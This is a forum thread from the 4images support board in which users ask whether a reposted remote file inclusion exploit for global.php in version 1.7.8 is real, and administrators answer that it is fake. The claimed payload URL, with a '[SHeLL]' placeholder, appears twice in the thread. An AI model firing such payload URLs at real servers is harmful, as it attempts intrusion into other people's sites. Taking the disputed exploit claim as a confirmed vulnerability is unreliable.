Author Topic: Bug in file global.php 1.7.8  (Read 6757 times)

0 Members and 1 Guest are viewing this topic.

Offline ReMoN

  • Newbie
  • *
  • Posts: 30
  • 3eun.com
    • View Profile
    • شبكة عيون
Bug in file global.php 1.7.8
« on: September 17, 2010, 06:57:22 PM »
i found this warning in Arabic website

-----------------------------------------------------
Exploit Title: [4image 1.7.8 Remote File Include ]

Tested on: [Windows XP]

Version: [v 1.7.8 ]

Exploit: http://target/4images1.7.8/4images/global.php?db_servertype=[SHeLL]

-----------------------------------------------------
my PHP experience is not that good to search and fix Bugs and the Arabic forum here have no support

my question : is there is really Bug in global.php or it had been fixed ?


Offline V@no

  • If you don't tell me what to do, I won't tell you where you should go :)
  • Global Moderator
  • 4images Guru
  • *****
  • Posts: 17.849
  • mmm PHP...
    • View Profile
    • 4images MODs Demo
Re: Bug in file global.php 1.7.8
« Reply #1 on: September 17, 2010, 08:09:24 PM »
Can you post the site you found this from?

But what you showed doesn't look like any problems, because global.php cannot be executed directly as in your example.
Your first three "must do" before you ask a question:
Please do not PM me asking for help unless you've been specifically asked to do so. Such PMs will be deleted without answer. (forum rule #6)
Extension for Firefox/Thunderbird: Master Password+    Back/Forward History Tweaks (restartless)    Cookies Manager+    Fit Images (restartless for Thunderbird)

Offline ReMoN

  • Newbie
  • *
  • Posts: 30
  • 3eun.com
    • View Profile
    • شبكة عيون
Re: Bug in file global.php 1.7.8
« Reply #2 on: September 17, 2010, 08:46:48 PM »
« Last Edit: September 17, 2010, 09:18:01 PM by ReMoN »

Offline mody64

  • Pre-Newbie
  • Posts: 3
    • View Profile
Re: Bug in file global.php 1.7.8
« Reply #3 on: September 22, 2010, 10:05:46 PM »
is this right , please ?

Offline V@no

  • If you don't tell me what to do, I won't tell you where you should go :)
  • Global Moderator
  • 4images Guru
  • *****
  • Posts: 17.849
  • mmm PHP...
    • View Profile
    • 4images MODs Demo
Re: Bug in file global.php 1.7.8
« Reply #4 on: September 22, 2010, 10:26:11 PM »
First of all, welcome to 4images forum.

Secondly, please be patient and read forum rules (that is about your PM and unnecessary reporting topic)

As of your question, personally I don't see any problems in global.php or anything related to the exploit posted. However I may lack of knowledge to actually confirm this...don't take my word for it just yet. This being investigated.
Your first three "must do" before you ask a question:
Please do not PM me asking for help unless you've been specifically asked to do so. Such PMs will be deleted without answer. (forum rule #6)
Extension for Firefox/Thunderbird: Master Password+    Back/Forward History Tweaks (restartless)    Cookies Manager+    Fit Images (restartless for Thunderbird)

Offline mody64

  • Pre-Newbie
  • Posts: 3
    • View Profile
Re: Bug in file global.php 1.7.8
« Reply #5 on: September 22, 2010, 11:45:54 PM »
thank you admin for your reply

i wait your reply after investigated

best wishes

Offline kai

  • Administrator
  • Addicted member
  • *****
  • Posts: 1.421
    • View Profile
    • 4images - Image Gallery Management System
Re: Bug in file global.php 1.7.8
« Reply #6 on: September 23, 2010, 09:29:32 AM »
That's a fake.

global.php can't be accessed directly. Give it a try:
]http://demo.4homepages.de/global.php?db_servertype=[SHeLL]
Your first three "must do" before you ask a question:
1. Forum rules
2. FAQ
3. Search

Offline mody64

  • Pre-Newbie
  • Posts: 3
    • View Profile
Re: Bug in file global.php 1.7.8
« Reply #7 on: September 23, 2010, 12:05:33 PM »
thanks kai

i pleased to heared that

i hope if appear any thing about that , Let us know

Thank you again   :D